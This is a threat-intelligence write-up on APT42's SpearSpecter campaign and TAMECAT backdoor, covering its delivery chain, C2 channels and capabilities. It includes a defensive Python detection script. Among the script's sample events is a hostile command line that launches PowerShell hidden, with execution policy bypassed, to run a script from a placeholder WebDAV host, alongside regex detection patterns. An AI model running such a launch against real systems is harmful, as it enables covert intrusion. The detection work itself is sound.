TAMECAT Backdoor
A wave of espionage activity tied to the Iranian state-aligned group APT42 has surfaced, with analysts observing a focused effort against individuals and organizations linked to the interests of the Islamic Revolutionary Guard Corps (IRGC). Detected in early September 2025 and assigned the codename SpearSpecter, this operation demonstrates a sophisticated blend of social engineering and tailored malware deployment aimed at intelligence collection.
A Broadened Targeting Strategy
The operators behind this campaign have aimed directly at senior government and defense officials, using highly personalized approaches to draw them into conversation. Invitations to prominent conferences and offers of influential meetings are common lures. A defining characteristic of this activity is the widening of the victim pool to include family members of the primary targets, which both increases pressure on those targets and expands the attack surface around them.
Origins and Evolution of APT42
APT42 was first publicly documented in 2022, when researchers linked it to activity tracked under several other IRGC-associated names, including APT35, Charming Kitten, ITG18, Mint Sandstorm, and TA453. The group's operational trademark is its ability to sustain long-running social engineering operations, sometimes lasting weeks, while impersonating trusted contacts to build credibility before delivering malicious links or payloads.
In June 2025, specialists uncovered another major campaign aimed at Israeli cybersecurity and technology professionals. In that case, the attackers posed as executives and researchers in both email and WhatsApp communications. Although related, the June activity and SpearSpecter stem from two different internal clusters of APT42: cluster B focuses on credential theft, while cluster D centers on malware-driven intrusions.
Personalized Deception Tactics
At the core of SpearSpecter lies a flexible attack methodology shaped around the target’s value and the operators’ objectives. Some victims are redirected to counterfeit meeting portals engineered to harvest credentials. Others face a more intrusive approach that delivers a persistent PowerShell backdoor named TAMECAT, a tool repeatedly used by the group in recent years.
Common attack chains begin with impersonation on WhatsApp, where the adversary forwards a malicious link claiming to be a required document for an upcoming engagement. Clicking it triggers a redirect sequence that ends in a search-ms: URI. Windows hands that URI to Explorer, which opens a search window populated from the attacker's WebDAV share, so the LNK file disguised as a PDF is presented to the victim as if it were a local document.
The TAMECAT Backdoor: Modular, Persistent, and Adaptive
Once executed, the LNK file connects to an attacker-operated Cloudflare Workers subdomain to fetch a batch script that launches TAMECAT. This PowerShell-based framework uses modular components to support exfiltration, surveillance, and remote management. Its command-and-control (C2) channels span HTTPS, Discord, and Telegram, so operations can continue if one channel is taken down.
For Telegram-based operations, TAMECAT retrieves and executes PowerShell code relayed by a bot under the attackers’ control. Discord-based C2 makes use of a webhook that sends system details and receives commands from a predefined channel. Analysis suggests commands may be customized per infected host, enabling coordinated activity against multiple targets via a shared infrastructure.
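The delivery chain and C2 channels described above leave a few telemetry artifacts that are cheap to hunt for: a search-ms: URI whose location points at a UNC/WebDAV path, a process launched from a WebDAV share (the @SSL host qualifier or the DavWWWRoot virtual folder in its path), and PowerShell opening connections to Discord, the Telegram Bot API, or a workers.dev host. The following is an added example, not tooling from the original report or from the researchers who analyzed the campaign. It runs those three checks over constructed, Sysmon-like process-creation (EventID 1) and network-connection (EventID 3) events; every hostname, path, and file name in the sample data is an invented placeholder, not an indicator from the campaign.

```python
"""Toy detections for the SpearSpecter-style delivery and C2 chain.

Added example, not code from the original report. Events are constructed,
Sysmon-like dicts; all hostnames, paths and file names are placeholders.
"""
import re

# WebDAV UNC markers: a host qualified with @SSL (optionally @port), or the
# DavWWWRoot virtual folder that Windows inserts into WebDAV paths.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@SSL(?:@\d+)?\\|\\DavWWWRoot\\", re.IGNORECASE)
# search-ms: URI whose crumb=location points at a UNC path, not a local folder.
SEARCH_MS_REMOTE = re.compile(r"search-ms:[^\"']*crumb=location:\\\\", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Legitimate services the report names as C2 transports; only suspicious
# when the client process is PowerShell rather than a browser or chat app.
C2_HOSTS = {
    "discord.com": "Discord webhook/API",
    "discordapp.com": "Discord webhook/API",
    "api.telegram.org": "Telegram Bot API",
}

RULE_SEARCH_MS = "search-ms: URI targeting a remote UNC/WebDAV location"
RULE_WEBDAV_EXEC = "process launched from or referencing a WebDAV share"
RULE_PS_C2 = "PowerShell network connection to chat-service C2 host"
RULE_PS_WORKERS = "PowerShell network connection to a Cloudflare Workers host"

# Constructed sample telemetry (placeholder hosts and paths, not real IOCs).
SAMPLE_EVENTS = [
    # 0: Explorer handling a search-ms: URI that points at a WebDAV share
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=agenda&crumb=location:\\files.example.invalid@SSL\DavWWWRoot\docs&displayname=Downloads"',
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CurrentDirectory": r"C:\Users\target"},
    # 1: PowerShell started by the disguised LNK, working directory on the share
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -f "\\files.example.invalid@SSL\DavWWWRoot\docs\agenda.ps1"',
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"\\files.example.invalid@SSL\DavWWWRoot\docs"},
    # 2: Benign search-ms: against a local folder; must not fire
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=report&crumb=location:C:\Users\target\Documents"',
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"C:\Users\target"},
    # 3-5: PowerShell reaching a Workers host, the Telegram Bot API and Discord
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "stage.example-worker.workers.dev", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    # 6: Benign browser traffic to Discord; must not fire
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
]


def detect(event: dict) -> list[str]:
    """Return the names of all rules one event matches (empty list if none)."""
    hits = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        if SEARCH_MS_REMOTE.search(cmd):
            hits.append(RULE_SEARCH_MS)
        if WEBDAV_UNC.search(cmd) or WEBDAV_UNC.search(event.get("CurrentDirectory", "")):
            hits.append(RULE_WEBDAV_EXEC)
    elif event.get("EventID") == 3:
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        host = event.get("DestinationHostname", "").lower()
        if image in POWERSHELL:
            if host in C2_HOSTS:
                hits.append(f"{RULE_PS_C2}: {C2_HOSTS[host]} ({host})")
            elif host.endswith(".workers.dev"):
                hits.append(f"{RULE_PS_WORKERS} ({host})")
    return hits


def run_detections(events) -> list[tuple[int, str]]:
    """Apply detect() to every event and return (event index, rule) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in detect(ev)]


if __name__ == "__main__":
    for idx, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The host-based rules are deliberately scoped to PowerShell as the client process; Discord and Telegram traffic from a browser or desktop client is normal, and the report's point is that the implant hides among that normal traffic. In a real deployment the WebDAV and search-ms: rules are the higher-fidelity pair, since few legitimate workflows launch shortcuts from an @SSL WebDAV path.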
Capabilities That Support Deep Espionage
TAMECAT offers a broad suite of intelligence-gathering features. Among them:
- Data collection and extraction
  - Harvesting files with specified extensions
  - Extracting data from Google Chrome, Microsoft Edge, and Outlook mailboxes
  - Performing continuous screenshot capture every 15 seconds
  - Exfiltrating collected information through HTTPS or FTP
- Stealth and evasion measures
  - Encrypting telemetry and payloads
  - Obfuscating PowerShell source code
  - Using living-off-the-land binaries to blend malicious actions with normal system behavior
  - Executing primarily in memory to minimize disk artifacts
A Resilient and Camouflaged Infrastructure
The infrastructure supporting SpearSpecter blends attacker-controlled systems with legitimate cloud services to obscure malicious activity. This hybrid approach supports the initial compromise, durable C2 communications, and covert data extraction, and it means that blocking individual services is not enough, since the same Cloudflare, Discord, and Telegram endpoints carry legitimate traffic. The operational design reflects a threat actor intent on long-term infiltration of high-value networks while maintaining minimal exposure.
Conclusion
The SpearSpecter campaign underscores APT42’s ongoing refinement of espionage operations, combining long-term social engineering, adaptive malware, and robust infrastructure to advance intelligence objectives. Its persistent and highly targeted nature places officials, defense personnel, and affiliated individuals at continued risk, reinforcing the need for heightened vigilance and strong security hygiene across all communication channels.